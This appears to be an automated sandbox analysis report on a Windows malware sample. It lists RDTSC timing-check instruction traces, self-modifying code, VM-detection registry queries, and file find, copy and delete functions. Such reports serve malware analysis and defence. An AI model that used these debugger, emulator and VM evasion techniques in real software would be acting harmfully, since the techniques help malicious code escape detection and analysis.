Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B83AE second address: 7B83B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B83B4 second address: 7B83B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9960 second address: 7B998C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCA94C93E3Ch 0x00000008 jl 00007FCA94C93E52h 0x0000000e jmp 00007FCA94C93E46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7742 second address: 7B7771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jne 00007FCA94618477h 0x00000011 jmp 00007FCA94618471h 0x00000016 js 00007FCA9461846Ah 0x0000001c push eax 0x0000001d pop eax 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD94C second address: 7BD952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD952 second address: 7BD95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD95B second address: 7BD961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD961 second address: 7BD98B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94618475h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA9461846Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2815 second address: 7C2819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2819 second address: 7C282E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FCA94618468h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C282E second address: 7C2847 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2847 second address: 7C284B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C284B second address: 7C284F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C284F second address: 7C2855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D2096 second address: 7D20C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E3Dh 0x00000009 jmp 00007FCA94C93E3Dh 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FCA94C93E36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20C1 second address: 7D20C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D20C5 second address: 7D20DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FCA94C93E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E3Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C16 second address: 7D1C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C20 second address: 7D1C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C24 second address: 7D1C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C30 second address: 7D1C49 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FCA94C93E36h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C49 second address: 7D1C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C58 second address: 7D1C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E45h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FCA94C93E36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C77 second address: 7D1C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1DBD second address: 7D1DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FCA94C93E3Ch 0x0000000b jnp 00007FCA94C93E36h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C19 second address: 7D5C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C1F second address: 7D5C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCA94C93E47h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C40 second address: 7D5C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C47 second address: 7D5C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007FCA94C93E36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D5C53 second address: 7D5C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7F83 second address: 7D7F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D7F8F second address: 7D7F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D80D6 second address: 7D80F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FCA94C93E43h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D80F4 second address: 7D80FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5DC2 second address: 7E5DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5DCF second address: 7E5DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EEB54 second address: 7EEB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED39E second address: 7ED3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618470h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED3B2 second address: 7ED3F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E48h 0x00000007 jmp 00007FCA94C93E48h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FCA94C93E42h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED57D second address: 7ED58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCA94618466h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED58C second address: 7ED590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED590 second address: 7ED59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FCA94618466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED59C second address: 7ED5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ED9E3 second address: 7ED9ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDB39 second address: 7EDB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDCDD second address: 7EDCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDCE2 second address: 7EDD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E49h 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E42h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDD19 second address: 7EDD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EDD1F second address: 7EDD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F2303 second address: 7F2307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEC04 second address: 7FEC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E41h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEC26 second address: 7FEC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB353 second address: 7FB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB357 second address: 7FB376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C98A second address: 80C99E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FCA94C93E36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C99E second address: 80C9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007FCA9461846Ch 0x0000000f je 00007FCA94618466h 0x00000015 pushad 0x00000016 jmp 00007FCA94618479h 0x0000001b jnp 00007FCA94618466h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C9D7 second address: 80C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C9E2 second address: 80C9EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C9EF second address: 80C9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C5C7 second address: 81C5D3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94618466h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81B4E2 second address: 81B539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FCA94C93E3Dh 0x0000000c pushad 0x0000000d jmp 00007FCA94C93E45h 0x00000012 jnc 00007FCA94C93E36h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jp 00007FCA94C93E4Ch 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FCA94C93E44h 0x00000028 jo 00007FCA94C93E3Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81B96F second address: 81B975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BDAB second address: 81BDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E48h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BDC7 second address: 81BDD1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BDD1 second address: 81BDDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BF62 second address: 81BF68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BF68 second address: 81BF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FCA94C93E36h 0x00000012 popad 0x00000013 jmp 00007FCA94C93E44h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BF8F second address: 81BFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA94618478h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C2A6 second address: 81C2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8206B9 second address: 8206BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8206BD second address: 8206C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8206C3 second address: 8206C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820998 second address: 82099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82099C second address: 8209DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618477h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820A8A second address: 820A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820CED second address: 820CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 820CF1 second address: 820D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FCA94C93E3Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ebx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop ebx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FCA94C93E3Eh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push esi 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237AD second address: 8237B3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237B3 second address: 8237B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237B8 second address: 8237BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8237BE second address: 8237C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60299 second address: 4F60312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCA94618470h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FCA94618471h 0x00000017 or cl, 00000006h 0x0000001a jmp 00007FCA94618471h 0x0000001f popfd 0x00000020 call 00007FCA94618470h 0x00000025 mov dl, cl 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FCA94618474h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60312 second address: 4F60318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60318 second address: 4F60338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCA94618471h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60338 second address: 4F60359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 9Dh 0x00000005 mov eax, 7AF13A5Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f call 00007FCA94C93E40h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5A1A9C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 745B04 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7C6992 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005A754D rdtsc

0_2_005A754D

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00354910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0034E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0034ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00354570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034DE10
